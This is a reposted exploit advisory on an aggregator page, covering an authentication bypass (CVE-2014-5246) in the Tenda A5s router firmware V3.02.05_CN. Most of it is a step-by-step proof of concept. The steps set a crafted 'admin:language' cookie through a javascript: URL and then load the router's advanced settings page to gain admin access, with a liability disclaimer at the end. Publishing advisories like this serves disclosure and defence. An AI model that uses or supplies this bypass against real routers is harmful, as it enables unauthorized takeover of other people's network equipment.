Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability

$
0
0
-----------------------------------------------------------------------
          Tenda A5s Router Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author      : zixian
Mail        : me@zixian.org
Date        : Aug, 17-2014

Vendor      : http://tenda.com.cn/
Link        : http://tenda.com.cn/Catalog/Product/223
Version     : V3.02.05_CN
CVE         : CVE-2014-5246

Exploit & p0c
_____________

go to
    http://192.168.2.1/

then set cookie with javascript

    javascript:document.cookie='admin:language=zh-cn'

go to
    http://192.168.2.1/advance.asp

you are the admin!
_____________


//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Viewing all articles
Browse latest Browse all 8064

Trending Articles